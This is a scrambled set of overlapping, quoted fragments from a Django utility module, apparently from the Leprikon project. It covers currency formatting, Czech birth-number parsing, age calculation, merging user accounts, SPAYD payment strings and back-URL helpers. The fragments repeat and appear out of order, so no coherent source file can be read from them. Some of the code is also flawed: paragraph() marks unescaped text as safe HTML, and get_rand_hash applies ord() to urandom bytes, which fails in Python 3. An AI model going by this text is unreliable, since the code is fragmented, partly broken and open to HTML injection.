"return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\",",
"y > date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50",
"import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function",
"for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return",
"# both users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\",",
"and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters +",
"for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr:",
"\"positive_sign\"] if sign_pos == 0: s = \"(\" + s + \")\" elif",
"sign must be inserted between symbol and value s = \"<\" + s",
"sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\",",
"= s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: #",
"if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader",
"from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional",
"== 4: s = s.replace(\">\", sign) else: # the default if nothing specified;",
"\"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return",
"\" or \"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or",
"s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction",
"import os import re import string import unicodedata import zlib from datetime import",
"or \"\") + s else: s = s + (separated and \" \"",
"value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return",
"and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if",
"= target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from",
"and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user =",
"url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try to",
"localeconv = _get_localeconv() # This function is inspired by python's standard locale.currency(). def",
"if y > date.today().year % 100: year -= 100 month = int(birth_num[2:4]) %",
"= target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi",
"because using locale.setlocale later may be dangerous (It is not thread-safe in most",
"sign + s elif sign_pos == 2: s = s + sign elif",
"2: s = s + sign elif sign_pos == 3: s = s.replace(\"<\",",
"fraction for non integer values if digits and not isinstance(val, int): s +=",
"= \"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"])",
"int(date.today().year / 100) * 100 + y if y > date.today().year % 100:",
"today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year =",
"zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph = lazy(paragraph, str)",
"date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return today.year - birth_date.year",
"\"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s +",
"today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else \"\"",
"\"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp",
"s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE",
"\"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and \" \"",
"50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None):",
"def first_upper(s): return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target,",
"today: return today.year - birth_date.year - 1 else: return today.year - birth_date.year def",
"from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe",
"django.utils.translation import ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE",
"\"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module load. It is",
"( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login",
"\"\"\"Formats val according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES",
"= target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders",
"sign_pos == 0: s = \"(\" + s + \")\" elif sign_pos ==",
"from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined =",
"inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the",
"target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader =",
"- birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper()",
"target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login",
"= target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target",
"in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\",",
"for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s =",
"date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import",
"reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4]",
"sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\",",
"tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name,",
"not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target):",
"exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi",
"s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups)",
"and value s = \"<\" + s + \">\" smb = smart_text(localeconv[international and",
"= source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both",
"get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day)",
"+ (separated and \" \" or \"\") + smb sign_pos = localeconv[val <",
"lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]),",
"+ 1, 1) if birth_day_this_year > today: return today.year - birth_date.year - 1",
"if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login,",
"and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s",
"localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and",
"k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def",
"thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0]",
"for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper()",
"or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s + \")\"",
"or \"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"]",
"unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\"",
"int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if",
"leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are",
"birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year >",
"= re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else:",
"+ s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes =",
"urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return",
"attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def",
"django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _",
"smb + (separated and \" \" or \"\") + s else: s =",
"0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def",
"return date(year, month, day) def get_age(birth_date, today=None): today = today or date.today() try:",
"= sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if",
"elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\",",
"== 1: s = sign + s elif sign_pos == 2: s =",
"= birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954",
"\">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0",
"0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and",
"for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if",
"\")\" elif sign_pos == 1: s = sign + s elif sign_pos ==",
"def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return",
"int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today = today or date.today()",
"\"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc =",
"sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\")",
"import zlib from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions",
"1: s = sign + s elif sign_pos == 2: s = s",
"= smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and not",
"else: try: # try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except",
"from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import",
"return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else",
"\"p_sep_by_space\"] if precedes: s = smb + (separated and \" \" or \"\")",
"target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target",
"in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] +",
"and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"]",
"% (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s",
"except IndexError: pass else: try: # try to reuse original back url url_back",
"def _get_localeconv(): \"\"\" This function loads localeconv during module load. It is necessary,",
"by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency",
"or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated =",
"and \" \" or \"\") + s else: s = s + (separated",
"'<' and '>' are markers if the sign must be inserted between symbol",
"s else: s = s + (separated and \" \" or \"\") +",
"\").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits):",
"elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s",
"integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1]",
"\"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode())",
"return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32,",
"s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else:",
"import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ from",
"birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y =",
"attributes=None, exclude=[]): attributes = attributes or [f.name for f in source._meta.fields if f.name",
"merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and",
"= ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined )",
"from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError,",
"from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE = \"m\"",
"if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\",",
"[ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else:",
"raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ):",
"= locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is",
"= today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year",
"during module load. It is necessary, because using locale.setlocale later may be dangerous",
"between symbol and value s = \"<\" + s + \">\" smb =",
"> 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst)",
"else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s",
"v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text):",
"first_upper(s): return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None,",
"1, 1) if birth_day_this_year > today: return today.year - birth_date.year - 1 else:",
"1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if",
"both users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\",",
"original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back",
"string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]])",
"else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for",
"tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all():",
"the most fitting sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\",",
"back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url",
"s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non",
"birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before",
"the default if nothing specified; # this should be the most fitting sign",
"necessary, because using locale.setlocale later may be dangerous (It is not thread-safe in",
"using locale.setlocale later may be dangerous (It is not thread-safe in most of",
"def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num",
"sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: # the default",
"urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import",
"return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url,",
"from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" +",
"amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return",
"\"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated",
"= int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y < 54:",
"100 + y if y > date.today().year % 100: year -= 100 month",
"def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month,",
"- birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else \"\" def",
"s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s",
"target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined",
"\"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num):",
"and \" \" or \"\") + smb sign_pos = localeconv[val < 0 and",
"setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import",
"4: s = s.replace(\">\", sign) else: # the default if nothing specified; #",
"def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and",
"iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE",
"original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv()",
"from .conf import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\"",
"\"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif",
"return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return",
"== 3: s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\",",
"be the most fitting sign position s = sign + s return s.replace(\"<\",",
"current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get(",
"exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr))",
"url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args,",
"+ y else: year = int(date.today().year / 100) * 100 + y if",
"day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year,",
"# grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if",
"= settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval in",
"else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num)",
"sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if",
"- 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:]",
"for f in source._meta.fields if f.name not in exclude] for attr in attributes:",
"= merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined",
"\"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp",
"target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi =",
"s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and",
"> date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50 %",
"== 9: # before 1954 if y < 54: year = 1900 +",
"y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y <",
"source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth",
"+ s + \")\" elif sign_pos == 1: s = sign + s",
"# This function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats",
"import IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri,",
"\"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined",
"transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from",
"**kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def",
"\"\") + s else: s = s + (separated and \" \" or",
"+ s else: s = s + (separated and \" \" or \"\")",
"auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def",
"+ s elif sign_pos == 2: s = s + sign elif sign_pos",
"except KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url,",
"= target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else:",
"str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" %",
"\"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must be inserted",
"\"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if",
"recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request))",
"get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: #",
"source.last_login and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user",
"birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if",
"month, day) def get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year =",
"digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and",
"# the default if nothing specified; # this should be the most fitting",
"parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return",
"standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings for",
"leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for",
"function loads localeconv during module load. It is necessary, because using locale.setlocale later",
"smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or",
"def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: #",
"return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst):",
"return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK,",
"\"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for f",
"\"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not",
"errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\",",
") s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\",",
"int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y < 54: year",
"request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query",
"users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\",",
"< 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated",
"attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration",
"= localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0",
"tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists():",
"lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i",
"= merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for",
"url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back =",
"birth_date.month + 1, 1) if birth_day_this_year > today: return today.year - birth_date.year -",
"target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp,",
"s + (separated and \" \" or \"\") + smb sign_pos = localeconv[val",
"= localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb",
"year = 1800 + y else: year = int(date.today().year / 100) * 100",
"s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: # the",
"= s + sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif",
"amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\",",
"smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if digits and not isinstance(val,",
"s + \")\" elif sign_pos == 1: s = sign + s elif",
"len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and",
"s elif sign_pos == 2: s = s + sign elif sign_pos ==",
"the sign must be inserted between symbol and value s = \"<\" +",
"reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive",
"target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise",
"language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for",
"attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr:",
"year = int(date.today().year / 100) * 100 + y if y > date.today().year",
"in exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source,",
"if y < 54: year = 1900 + y else: year = 1800",
"s = s + sign elif sign_pos == 3: s = s.replace(\"<\", sign)",
"getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target",
"\"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) )",
"= date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return today.year -",
"if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer",
"string import unicodedata import zlib from datetime import date from urllib.parse import parse_qs,",
"and '>' are markers if the sign must be inserted between symbol and",
"return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) >",
"tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in",
"target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat",
"stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x",
